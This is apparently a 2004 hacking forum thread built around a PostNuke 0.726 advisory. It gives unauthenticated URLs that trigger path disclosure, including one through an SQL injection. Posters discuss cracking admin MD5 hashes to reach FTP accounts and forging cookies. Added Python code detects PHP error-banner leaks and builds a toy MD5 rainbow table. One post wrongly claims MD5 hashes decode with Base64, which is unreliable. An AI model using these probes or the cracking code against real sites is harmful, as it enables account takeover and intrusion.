Very nice little paper I found on mantissecurity.net. Allows you to get the admin hash and full path to their account. So if people have taught us anything, it's that they use the same pass for just about everything, so once you crack the admin hash you can sign into their FTP acct through getting their account name for the host and have root and access to everything (which isn't possible through just having the PostNuke admin pass).
PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/
Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - legacy code
http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice
Fatal error: Call to undefined function: deletenotice() in D:\apache_wwwroot\postnuke0726\admin.php on line 87
It seems that this function, deletenotice(), has been removed in newer versions, but the reference to it still exists. Btw, anyone can provoke this error without any authentication, not only admins.
A2 - path disclosure through sql injection
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p
Fatal error: Call to a member function on a non-object in D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454
This is an SQL injection bug through the variable named "thold", but here we use it for path disclosure.
B. Cross-site scripting aka XSS:
Exploiting XSS in PostNuke is a difficult task, because PostNuke will filter out most of the "useful" tags, like <script>. But anyway, XSS bugs exist and they can be exploited using some custom techniques (therefore losing cross-browser compatibility of the sploit).
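As an added example (written for this page, not code from the thread or from the advisory quoted above): a small Python checker that pulls the leaked filesystem path out of PHP's error banner and works out the server's document root from it. The two response bodies are constructed to match the two advisory requests, not captured traffic, and the function names are my own.

```python
import re
from urllib.parse import urlparse

# PHP's default error banner: "<type>: <message> in <absolute path> on line <n>".
PHP_ERROR_RE = re.compile(
    r"(?:Fatal error|Parse error|Warning|Notice):\s*(?P<msg>.+?)\s+in\s+"
    r"(?P<path>(?:[A-Za-z]:\\|/)[^\s<]+?)\s+on line\s+(?P<line>\d+)"
)


def find_path_disclosure(body):
    """Return [{'msg', 'path', 'line'}] for every PHP error banner in a response body.
    Tags are stripped first because PHP wraps the banner in <b>...</b> when html_errors is on."""
    text = re.sub(r"<[^>]+>", "", body)
    return [
        {"msg": m.group("msg"), "path": m.group("path"), "line": int(m.group("line"))}
        for m in PHP_ERROR_RE.finditer(text)
    ]


def infer_docroot(url, leaked_path):
    """Recover the document root by lining the request's URL path up with the tail of the
    leaked filesystem path. When the error came from an included file (the NS-Polls case),
    the script names do not line up, so fall back to matching only the leading URL
    directories; the rightmost match is taken so a repeated directory name higher up
    does not fool it."""
    url_parts = [p for p in urlparse(url).path.split("/") if p]
    fs_parts = re.split(r"[\\/]", leaked_path)
    sep = "\\" if "\\" in leaked_path else "/"
    for n in range(len(url_parts), 0, -1):
        prefix = url_parts[:n]
        for i in range(len(fs_parts) - n, -1, -1):
            if fs_parts[i:i + n] == prefix:
                return sep.join(fs_parts[:i])
    return None


def analyse(url, body):
    """Pair each leaked path with the document root it implies: (path, line, docroot)."""
    return [(h["path"], h["line"], infer_docroot(url, h["path"])) for h in find_path_disclosure(body)]


# Constructed responses modelled on the two advisory requests (not real captures).
SAMPLE_ADMIN_URL = "http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice"
SAMPLE_ADMIN_BODY = (
    r"<br /><b>Fatal error</b>:  Call to undefined function: deletenotice() in "
    r"<b>D:\apache_wwwroot\postnuke0726\admin.php</b> on line <b>87</b><br />"
)
SAMPLE_POLL_URL = ("http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls"
                   "&file=index&req=results&pollID=2&mode=thread&order=0&thold=p")
SAMPLE_POLL_BODY = (
    r"Fatal error: Call to a member function on a non-object in "
    r"D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454"
)

if __name__ == "__main__":
    for url, body in ((SAMPLE_ADMIN_URL, SAMPLE_ADMIN_BODY), (SAMPLE_POLL_URL, SAMPLE_POLL_BODY)):
        for path, line, root in analyse(url, body):
            print("%s:%d  docroot=%s" % (path, line, root))
```

The same parser works on any PHP application that leaves display_errors on; only the probe URLs are PostNuke-specific. A page that returns a generic 500 or a blank body gives an empty list, which is the fixed state the check should expect after the server is configured not to display errors.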
It's easier said than done... MD5s are such a bitch to crack.
+ I've used this before and it only returns something like an MD5 hash, only about 5 characters shorter. I'm not quite sure what to make of it... or at least the ones I've seen.
r3L4x
Apr 25 2004, 03:28 AM
No, it works fine. You would be surprised: a man calls himself a "programmer/hacker", yet his admin pass is, guess, admin99. People are stupider than you think.
Also, a hash is a hash is a hash; they all do the same thing no matter what algo it is. SHA, Tiger, CRC, MD, they all work the same. I guess the only diff would be how long it takes to compute.
archphase
Apr 25 2004, 03:56 AM
Is this how the noobs @ AYF (www.areyoufearless.com) got owned, yes?
ssj4conejo
Apr 25 2004, 05:08 AM
The admin99 pass is quite common; I wonder how many banana peels these admins smoke daily. The funniest pass that I've seen is mssucks... lol, a Win2k password. It shows the love for M$.
r3L4x
Apr 25 2004, 05:39 AM
I'm testing the waters of RainbowCrack 1.2 right now. I have just started generating the 200 MB hash table, and according to my calculations it should take another 9 hours. The table is for passwords of 8 to 13 chars, since brute-forcing every 7-character lowercase alphanumeric password takes about 30 min (and under that it takes seconds), but over 8 takes days.
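Added illustration of the time/memory trade-off the post above is talking about. This is a toy written for this page, not RainbowCrack's code or its table format: the keyspace (3 lowercase alphanumeric chars), chain length and chain count are deliberately tiny so it builds in about a second, and the reduction function is my own.

```python
import hashlib
import itertools
import string

# Toy parameters. The post's real table targets 8-13 character passwords and is 200 MB;
# here the keyspace is 36^3 = 46656 passwords so everything runs in about a second.
ALPHABET = string.ascii_lowercase + string.digits
PW_LEN = 3
CHAIN_LEN = 50
N_CHAINS = 2000
KEYSPACE = len(ALPHABET) ** PW_LEN


def md5_hex(pw):
    return hashlib.md5(pw.encode()).hexdigest()


def reduce_fn(digest_hex, step):
    """Map a digest back to *some* password in the keyspace. Folding `step` in gives every
    column its own reduction; that is what makes this a rainbow table rather than a plain
    hash chain, and it stops two chains that collide in one column from merging for good."""
    n = (int(digest_hex, 16) + step) % KEYSPACE
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)


def chain_password(start, position):
    """The password sitting in column `position` of the chain that begins at `start`."""
    pw = start
    for step in range(position):
        pw = reduce_fn(md5_hex(pw), step)
    return pw


def build_table(n_chains=N_CHAINS):
    """Precompute chains; only end -> [starts] is stored and the middle is recomputed on
    lookup. That is the trade-off: CHAIN_LEN hashes of work per chain at build time buy a
    table CHAIN_LEN times smaller than a full digest->password dictionary."""
    table = {}
    starts = ("".join(t) for t in itertools.product(ALPHABET, repeat=PW_LEN))
    for start in itertools.islice(starts, n_chains):
        table.setdefault(chain_password(start, CHAIN_LEN), []).append(start)
    return table


def lookup(table, target_hex):
    """Recover the password for an MD5 digest if some stored chain passes through it.
    For each column the digest could sit in, walk forward to the chain end; if that end
    is stored, rebuild the chain from its start and return the password whose hash matches.
    Returns None when no chain covers the digest (the table is never exhaustive)."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_fn(target_hex, col)
        for step in range(col + 1, CHAIN_LEN):
            pw = reduce_fn(md5_hex(pw), step)
        for start in table.get(pw, ()):
            cand = start
            for step in range(CHAIN_LEN):
                if md5_hex(cand) == target_hex:
                    return cand
                cand = reduce_fn(md5_hex(cand), step)
    return None


def coverage(table):
    """Fraction of the keyspace some chain actually passes through. Merges and repeated
    passwords make it less than N_CHAINS * CHAIN_LEN / KEYSPACE would suggest."""
    seen = set()
    for starts in table.values():
        for start in starts:
            pw = start
            for step in range(CHAIN_LEN):
                seen.add(pw)
                pw = reduce_fn(md5_hex(pw), step)
    return len(seen) / KEYSPACE


TABLE = build_table()

if __name__ == "__main__":
    target = chain_password("aaa", 7)
    print("table covers %.1f%% of the keyspace" % (100 * coverage(TABLE)))
    print("md5(%s) -> %s" % (target, lookup(TABLE, md5_hex(target))))
```

Two things the toy makes visible that the post's timing estimates do not: a lookup costs roughly CHAIN_LEN squared hash operations, which is why longer chains shrink the table but slow each crack, and coverage stays below 100% because chains merge, so a hash can come back as None even for a password inside the table's length range. A 7-character password such as admin99 is outside this toy's keyspace and simply is not found, which is the same outcome as a real table that was generated for 8-13 character passwords.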
What can you do with the MD5 hash for PostNuke? I've been trying to figure out the cookies... POSTNUKESID= ? Not really sure what info they are using to come up with the cookie. If anyone knows, please inform me.
whiskah
Jun 19 2004, 07:32 AM
QUOTE (Nick @ Jun 19 2004, 08:47 AM)
What can you do with the MD5 hash for PostNuke? I've been trying to figure out the cookies... POSTNUKESID= ? Not really sure what info they are using to come up with the cookie. If anyone knows, please inform me.
You have to crack/decrypt the MD5 hash, otherwise you have to modify your cookies. waraxe has made a nice tut on how to mod your cookie; just go to his site.
MasterWeb
Jun 19 2004, 02:42 PM
I think you can decrypt these hashes in a Base64 coder, like this: http://www.robertgraham.com/tools/base64coder.html Type adminuser:hash and then click decrypt! In PHP-Nuke I use this link: www.site.com/admin.php&admin=Hash ! But in PostNuke admin.php is redirected to index.php! Where can I use this decrypted hash!?
Nick
Jun 23 2004, 05:15 AM
But the info that is actually used in the PostNuke cookie isn't the actual MD5 hash of the pw. Does anyone know what it's the MD5 hash of?
Could it be the MD5 of
<user>:<md5 of the pw>
If anyone knows how the PostNuke cookies work, please let me know. I know how the phpnuke and phpbb ones work, just trying to figure out PostNuke.